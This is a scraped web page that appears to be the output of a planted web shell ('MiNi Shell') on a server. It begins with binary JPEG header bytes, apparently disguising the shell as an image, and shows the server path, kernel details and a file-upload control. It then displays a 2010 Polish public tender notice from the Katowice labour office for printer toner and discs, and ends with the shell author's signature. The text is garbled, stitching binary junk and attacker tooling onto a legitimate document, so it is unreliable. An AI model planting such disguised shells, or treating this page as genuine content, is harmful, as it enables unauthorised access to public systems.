JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100730/204843-N-2010.html

<p class="kh_header"><b>Katowice: DOSTAWA MATERIAŁÓW EKSPLOATACYJNYCH DO KOMPUTERÓW I DRUKAREK NA POTRZEBY WUP W KATOWICACH</b><br>
<b>Numer ogłoszenia: 204843 - 2010; data zamieszczenia: 30.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządu terytorialnego nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MATERIAŁÓW EKSPLOATACYJNYCH DO KOMPUTERÓW I DRUKAREK NA POTRZEBY WUP W KATOWICACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ilość zamawianych materiałów eksploatacyjnych:

1.	Wkład drukujący do Lexmark T640 DTN (64016HE)			- 20 sztuk
2.	Wkład drukujący do HP LaserJet 4250 DTN (Q5942X)		- 20 sztuk
3.	Fuser do HP LaserJet 4250 DTN (RM1-1083-070CN)			-  2 sztuki
4.	Wkład drukujący do HP LaserJet 4200 DTN (Q1338A)		-  2 sztuki
5.	Wkład drukujący do HP LaserJet 1200 (C7115X)			   -  5 sztuk
6.	Wkład drukujący do HP LaserJet 1320 (Q5949A)			   -  4 sztuki
7.	Wkład drukujący do Samsung ML-3561ND (ML-3560DB)	      -  5 sztuk
8.	Wkład drukujący cyan do Samsung CLP-550N: (CLP-500D5C)		-  1 sztuka
9.	Wkład drukujący magenta do Samsung CLP-550N: (CLP-500D5M)-  3 sztuki
10.	Wkład drukujący yellow do Samsung CLP-550N: (CLP-500D5Y)	-  5 sztuk
11.	Wkład drukujący black do Samsung CLP-550N: (CLP-500D7K)		-  6 sztuk
12.	Wkład drukujący do Samsung ML-3471ND (ML-D3470B)		-  1 sztuka
13.	Wkład drukujący do HP LaserJet 1010 (Q2612A)				- 10 sztuk
14.	Wkład drukujący do Samsung SCX-4720F (SCX-4720D5)		-  4 sztuki
15.	Wkład drukujący do HP M1522mf (CB534A)				-  5 sztuk
16.	Płyta CD-R w opakowaniu typu slim					- 500 sztuk
17.	Płyta Blu-Ray DB-R w opakowaniu typu slim				-  20 sztuk
18.	Płyta DVD+R w opakowaniu typu slim					- 200 sztuk 


Wkłady drukujące opisane w Lp. 1, 2, 4-15, dostarczone przez Wykonawcę będą fabrycznie nowe, to znaczy nie poddane procesowi regeneracji. Muszą posiadać komplet zabezpieczeń na czas przechowywania i transportu tak jak przewidział to producent drukarki, do której dedykowany jest wkład drukujący. W przypadku gdy produkt oryginalny posiada inteligentny układ elektroniczny (potocznie CHIP) przekazujący informację o stanie zużycia tonera i zastosowanym modelu wkładu drukującego, wykonawca dołączy oświadczenie, że produkt równoważny posiada układ analogicznie działający jak układ oryginalnego wkładu drukującego.

Wkłady drukujące muszą zawierać na obudowie informację umożliwiającą ich identyfikację. W przypadku materiałów równoważnych, gdy kod identyfikacyjny jest inny od kodu stosowanego przez producenta materiałów oryginalnych, Wykonawca jest zobowiązany dołączyć do oferty wykaz kodów producenta-ów zamienników wraz z informacją do jakich drukarek dany model jest dedykowany.
Wkłady drukujące muszą zostać dostarczone w oryginalnych opakowaniach producenta posiadających zabezpieczenia umożliwiające bezpieczny transport i składowanie tj. wypełnienia opakowania uniemożliwiające swobodne przemieszczanie się wkładu drukującego lub inne zabezpieczenia wkładu drukującego przed uszkodzeniem. Na opakowaniach muszą być wypisane wszystkie typy drukarek z którymi dany wkład drukujący jest kompatybilny, czyli dopuszczone do stosowania. Opakowania muszą posiadać czytelną nazwę producenta.

Producent wkładów drukujących musi posiadać zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzające posiadanie systemu zarządzania jakością ISO 9001, którego kopia musi zostać dołączona do oferty w postaci papierowej potwierdzonej za zgodność z oryginałem.

Producent wkładów drukujących musi posiadać zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzające posiadanie systemu zarządzania środowiskowego ISO 14001, którego kopia musi zostać dołączona do oferty w postaci papierowej potwierdzonej za zgodność z oryginałem.

W przypadku wkładów drukujących równoważnych wymagane jest posiadanie zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzające wydajność wkładu drukującego nie mniejszą niż deklarowaną przez producenta danego modelu oryginalnego wkładu drukującego, mierzoną zgodnie z normą ISO-IEC 19752 (dotyczy wkładów drukujących opisanych w Lp. 1, 2, 4-7, 12-15). Dokument potwierdzający spełnienie powyższych warunków musi zostać dołączony do oferty w postaci papierowej, dla każdego oferowanego równoważnego wkładu drukującego.

W przypadku wkładów drukujących równoważnych wymagane jest posiadanie zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzające wydajność wkładu drukującego nie mniejszą niż deklarowaną przez producenta danego modelu oryginalnego wkładu drukującego, mierzoną zgodnie z normą ISO-IEC 19798 (dotyczy wkładów drukujących opisanych w Lp. 8-11). Dokument potwierdzający spełnienie powyższych warunków musi zostać dołączony do oferty w postaci papierowej, dla każdego oferowanego równoważnego wkładu drukującego.

Zamawiający wymaga, aby dostarczone wkłady drukujące posiadały 24 miesięczną gwarancję od dnia dostawy. Gwarancja obejmuje prawidłowe działanie wkładu drukującego przez cały okres jego eksploatacji (do wyczerpania tonera) obejmując zarówno usterki materiałowe jak i produkcyjne.
Wykonawca zobowiązuje się do pokrycia kosztów naprawy urządzenia, gdy jego uszkodzenie powstanie w wyniku stosowania wkładów drukujących-równoważnych- dostarczonych przez Wykonawcę: Za podstawę żądania przez Zamawiającego naprawy urządzenia  uważa się pisemną opinię autoryzowanego serwisu producenta urządzenia. Wykonawca zobowiązany jest w terminie 3 dni roboczych (od dnia zgłoszenia przez Zamawiającego konieczności wykonania naprawy urządzenia) do wykonania zlecenia serwisowego w autoryzowanym serwisie producenta urządzenia.
Naprawa urządzenia przez autoryzowany serwis producenta może odbyć się jedynie w siedzibie Zamawiającego lub w autoryzowanym serwisie producenta po uprzednim odebraniu urządzenia przez firmę kurierską wskazaną przez autoryzowany serwis. Koszty związane z naprawą ponosi Wykonawca.

W razie stwierdzenia wad, braku towaru lub dostarczenia towaru niezgodnego z zamówieniem  Zamawiający niezwłocznie powiadomi Wykonawcę o zaistniałych okolicznościach (reklamacja), a Wykonawca zobowiązuje się na własny koszt do uzupełnienia braku, wymiany wadliwego lub niezgodnego przedmiotu zamówienia w terminie 4 dni od dnia powiadomienia.

Fusery opisane w Lp. 3, dostarczone przez Wykonawcę będą fabrycznie nowe, to znaczy nie poddane procesowi regeneracji ani refabrykacji. Zamawiający wymaga, aby dostarczone fusery posiadały 24 miesięczną gwarancję od dnia dostawy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.23.43.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający przewiduje wniesienie wadium w wysokości 1 680,00 złotych (jeden tysiąc sześćset osiemdziesiąt złotych 00/100):</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonali w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej pięć dostaw odpowiadających swoim rodzajem i zakresem przedmiotowi zamówienia o wartości łącznej nie mniejszej niż 100 000,- zł.

Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia w/w warunku według formuły -spełnia-nie spełnia- na podstawie załączonego do oferty wykazu wykonanych dostaw z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane lub są wykonywane należycie (np. referencje).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzające posiadanie systemu zarządzania jakością ISO 9001 dołączone do oferty w postaci papierowej - składają wszyscy Wykonawcy

Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia ww warunku według formuły -spełnia-nie spełnia- na podstawie załączonej do oferty kserokopii zaświadczenia, poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną, potwierdzającego posiadanie systemu zarządzania jakością ISO 9001 przez Producenta oferowanych wkładów drukujących.

2)	zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzające posiadanie systemu zarządzania środowiskowego ISO 14001 dołączone do oferty w postaci papierowej - - składają wszyscy Wykonawcy

Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia w/w warunku według formuły -spełnia-nie spełnia- na podstawie załączonej do oferty kserokopii zaświadczenia, poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną, potwierdzającego posiadanie systemu zarządzania środowiskowego ISO 14001 przez Producenta oferowanych wkładów drukujących.

3)	W przypadku wkładów drukujących równoważnych dodatkowo wymagane jest posiadanie zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzające wydajność wkładu drukującego nie mniejszą niż deklarowaną przez producenta danego modelu oryginalnego wkładu drukującego, mierzoną zgodnie z normą ISO-IEC 19752 (dotyczy wkładów drukujących opisanych w Lp. 1, 2, 4-7, 12-15). Dokument potwierdzający spełnienie powyższych warunków powinien być dołączony do oferty w postaci papierowej oddzielnie dla każdego oferowanego równoważnego wkładu drukującego.

Opis sposobu dokonywania oceny spełnienia tego warunku:

Zamawiający dokona oceny spełnienia w/w warunku według formuły -spełnia-nie spełnia- na podstawie załączonej do oferty kserokopii zaświadczenia, poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną, potwierdzającego wydajność oferowanego wkładu drukującego mierzoną zgodnie z normą ISO-IEC 19752. 

4)	W przypadku wkładów drukujących równoważnych dodatkowo wymagane jest posiadanie zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzające wydajność wkładu drukującego nie mniejszą niż deklarowaną przez producenta danego modelu oryginalnego wkładu drukującego, mierzoną zgodnie z normą ISO-IEC 19798 (dotyczy wkładów drukujących opisanych w Lp. 8-11). Dokument potwierdzający spełnienie powyższych warunków powinien być dołączony do oferty w postaci papierowej - oddzielnie dla każdego oferowanego równoważnego wkładu drukującego.

Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia ww warunku według formuły -spełnia-nie spełnia- na podstawie załączonej do oferty kserokopii zaświadczenia, poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną, potwierdzającego wydajność oferowanego wkładu drukującego mierzoną zgodnie z normą ISO-IEC 19798. 

5)	W przypadku wkładów drukujących równoważnych dodatkowo wymagane jest złożenie oświadczenia dotyczącego oferowanych materiałów równoważnych 

Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia ww warunku według formuły -spełnia-nie spełnia- na podstawie załączonego do oferty oświadczenia. 


Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.1.2). W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach,  ul. Kościuszki 30 , pok. 304-305, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2010 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Katowicach,  ul. Kościuszki 30 , pok. 352 - Kancelaria Urzędu, III piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com